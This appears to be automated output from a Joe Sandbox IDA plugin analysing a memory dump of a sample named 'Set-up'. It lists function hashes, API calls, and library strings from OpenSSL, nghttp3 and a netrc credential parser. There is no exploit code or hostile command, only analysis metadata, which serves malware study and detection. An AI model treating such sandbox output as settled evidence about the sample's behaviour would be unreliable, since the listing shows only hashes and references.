                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: default$login$macdef$machine$netrc.c$password
                                      • API String ID: 0-1043775505
                                      • Opcode ID: 921884f8e5347abda31054fb81ff526f29939fe795f58a0cf702263fa32c2123
                                      • Instruction ID: 5dcde86d4ea985aa02f9881be08dbe646553765c5637dc29fd24640d3c801a9a
                                      • Opcode Fuzzy Hash: 921884f8e5347abda31054fb81ff526f29939fe795f58a0cf702263fa32c2123
                                      • Instruction Fuzzy Hash: 37E147B450C7529BE7109F24A885B2B7FD4BF85708F18882CF88D57282E3B5DD48E792
                                      APIs
                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,0008000F,00000008,?,00702212,00000000,00000000), ref: 00680109
                                        • Part of subcall function 006C7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,006EBD91), ref: 006C7262
                                        • Part of subcall function 006C7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,006EBD91), ref: 006C7285
                                        • Part of subcall function 006C7220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,006EBD91), ref: 006C72C5
                                        • Part of subcall function 006C7220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,006EBD91), ref: 006C72E8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: strlen$strcpy
                                      • String ID: 1$a2d_ASN1_OBJECT$crypto/asn1/a_object.c
                                      • API String ID: 2790333442-843477118
                                      • Opcode ID: 222c95e069a106aec7d6d6d2419681b279cef0c0f14a4f124439c747d25c3693
                                      • Instruction ID: 756ed8ac5df58dac7a9ab176884ddc19ef1b197d86938e495683b1f3f2406eca
                                      • Opcode Fuzzy Hash: 222c95e069a106aec7d6d6d2419681b279cef0c0f14a4f124439c747d25c3693
                                      • Instruction Fuzzy Hash: CFE15D319083018BE761BF28D84175EB7E2AF91754F048F2DF8D8A7392E770D9498B82
                                      APIs
                                      • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0((size_t)(p - buf->last) == len,nghttp3_qpack.c,000007B9,?,?,?,?,?,?,?,005BC1CE,?,00000003,?), ref: 005BE4EE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: _assert
                                      • String ID: (size_t)(p - buf->last) == len$nghttp3_qpack.c
                                      • API String ID: 1222420520-1997541155
                                      • Opcode ID: 410063ed4a21ce7b8318a86ae1a5326d456763db03c7ab9266ba6d94607580f1
                                      • Instruction ID: 28fb60613c90600388cb5559a5e9217c116dc2a78b13ee9c031df1da09fbe9f8
                                      • Opcode Fuzzy Hash: 410063ed4a21ce7b8318a86ae1a5326d456763db03c7ab9266ba6d94607580f1
                                      • Instruction Fuzzy Hash: B8E1E636B042105BD7199E2CC8817A9BBD7BBD5310F2D8A3CE599C73D2D635EC498781
                                      APIs
                                      • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,00000000,00000400), ref: 0077E5F2
                                      • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000400), ref: 0077E67F
                                      • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000400), ref: 0078003E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: memcpy
                                      • String ID:
                                      • API String ID: 3510742995-0
                                      • Opcode ID: ce7ec1f2f7fb3d3acd66306ae896682ebbc6e261da65e7adf02f9e3cb134e561
                                      • Instruction ID: 3236bfd694ba92cd4d5ee6b7088897e9f08b24ab4762bfb06fcde1e27661f114
                                      • Opcode Fuzzy Hash: ce7ec1f2f7fb3d3acd66306ae896682ebbc6e261da65e7adf02f9e3cb134e561
                                      • Instruction Fuzzy Hash: 1CD23DAAC39BD541E723A63D68132E6E7506FFB248F51E72BFCD430E52AB217184421D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4$`$`
                                      • API String ID: 0-1230936812
                                      • Opcode ID: 584f368a86dbcc5af3ec16d5e9f719c7db032f64cabf71b9093de76f8398434d
                                      • Instruction ID: 9cac0cbaaf966cdc24dd338bc0b49f163601e31d2743690ae9a602067ff5f368
                                      • Opcode Fuzzy Hash: 584f368a86dbcc5af3ec16d5e9f719c7db032f64cabf71b9093de76f8398434d
                                      • Instruction Fuzzy Hash: 43B2C072D087958FD724DF18C8806AAB7E1FFDA304F158B2EE99597352D730A905CB82
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: da40db7e6db55fcd0d112687bb59f92d9cbffaf0df182664d049c9956c8b3674
                                      • Instruction ID: 87df328cd77c5cd0e0e10bceef4a89d47cd02684b986a494bf352d2c2f81fb32
                                      • Opcode Fuzzy Hash: da40db7e6db55fcd0d112687bb59f92d9cbffaf0df182664d049c9956c8b3674
                                      • Instruction Fuzzy Hash: 80A2AE71A08B16DFC718CF29C490669F7E1FF89324F16866DE8A987781D734E861CB81
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: $ $
                                      • API String ID: 0-3665324030
                                      • Opcode ID: 44926a9952185c717709522a6c7a105de9636f1a377ff329ad924952f8b001f7
                                      • Instruction ID: 6297bd8d74fd87c72cd6517b8f55a7ba09931c9cf75f5557603f46aab738e4b4
                                      • Opcode Fuzzy Hash: 44926a9952185c717709522a6c7a105de9636f1a377ff329ad924952f8b001f7
                                      • Instruction Fuzzy Hash: 5F62EE75A083958FC324DF29C48066AFBE1FFC8314F148A2EE9D993351E734A955CB92
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: ossl_qrl_enc_level_set_provide_secret$quic hpquic kuossl_qrl_enc_level_set_key_update$ssl/quic/quic_record_shared.c
                                      • API String ID: 0-2745174052
                                      • Opcode ID: 907da8c67dbb54749420604c40a95f12dcff6298cb64b8a88646a80a06254d55
                                      • Instruction ID: f71e5de980fc28e42afd7c48fe9684d54fcda5db226381a1b7b4a35f18ff3012
                                      • Opcode Fuzzy Hash: 907da8c67dbb54749420604c40a95f12dcff6298cb64b8a88646a80a06254d55
                                      • Instruction Fuzzy Hash: 30D1F5716083469BE7309F51DC52FABB7E7AF84704F04082CFA8957382E671E914DBA6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5eda49f86767346dce642dd589e1dddd2f840c7498b2d7e6a7a9bdfb4b440d6f
                                      • Instruction ID: 924c2bce9dd6ff0b8e03e53ffd05bb0e906e94886c9e269f26befe431cd0ed2a
                                      • Opcode Fuzzy Hash: 5eda49f86767346dce642dd589e1dddd2f840c7498b2d7e6a7a9bdfb4b440d6f
                                      • Instruction Fuzzy Hash: F2829D72A087558FC724DF28C88426AF7E2FBC8714F158A2DE999D7351D770A849CF82
                                      APIs
                                      • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000400), ref: 0077E16E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: memcpy
                                      • String ID: providers/implementations/kdfs/argon2.c
                                      • API String ID: 3510742995-3406374482
                                      • Opcode ID: acdf2bf2d14c00e7212f35e165b540710e976da70d15787bbc492a5cf27da7a2
                                      • Instruction ID: d219b43c718ba77c22709c40952121acba024a459fce2d63ea584f00a34016ec
                                      • Opcode Fuzzy Hash: acdf2bf2d14c00e7212f35e165b540710e976da70d15787bbc492a5cf27da7a2
                                      • Instruction Fuzzy Hash: F7513871D087009BC310EB28D84169AF7E8FF98354F55CA2DE989A3242E331FA85CB85
                                      APIs
                                      • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?), ref: 0052608E
                                      • BCryptGenRandom.BCRYPT(00000000,?,?,00000002), ref: 0052609C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: CryptRandommemset
                                      • String ID:
                                      • API String ID: 642379960-0
                                      • Opcode ID: ed3a7cbaad8e65eee748a71967fda291a8ccc576b531fdca0ca96a0362d7ea6c
                                      • Instruction ID: 458a3481382e13380d3057450f4b84ede90e5bfa8f6db528e0512a8c75361790
                                      • Opcode Fuzzy Hash: ed3a7cbaad8e65eee748a71967fda291a8ccc576b531fdca0ca96a0362d7ea6c
                                      • Instruction Fuzzy Hash: 04D05E3230935137DA24612D6C17F5F5A9CEFC7B20F0C402EB504E2282D560A80182A6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID: 0-3916222277
                                      • Opcode ID: 300c07fb6fc8e82579adbc0999223b65324722cb4911c0f5f51449b7cd02f531
                                      • Instruction ID: 64f1ba411b23b1b556fb2066d1969352ec15a6bd167a61a67005bfb6cc7ca8ae
                                      • Opcode Fuzzy Hash: 300c07fb6fc8e82579adbc0999223b65324722cb4911c0f5f51449b7cd02f531
                                      • Instruction Fuzzy Hash: 65E23531A0C3668BCB14DF69D09412EFBE2FBC8314F198A2DE99697350D670ED45CB86
                                      APIs
                                      • memset.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000,?,?,?,?,?,?,00000000,?,?,008622FC,?,?), ref: 0086447B
                                      • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000001), ref: 00864760
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: memset
                                      • String ID:
                                      • API String ID: 2221118986-0
                                      • Opcode ID: b5dcf494e3307ecc86f7bbf26163a7b867721a4a9001fa6fb7e18d935f097b88
                                      • Instruction ID: c2dde4256e0d3b8c5703a62289f36b7b7a176679dbfc8ccf85832c7a157c6161
                                      • Opcode Fuzzy Hash: b5dcf494e3307ecc86f7bbf26163a7b867721a4a9001fa6fb7e18d935f097b88
                                      • Instruction Fuzzy Hash: 31C1AA75604B058FD724CF29C480A2AB7E2FF86314F258A2DE5AAC7791EB30F845CB51
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
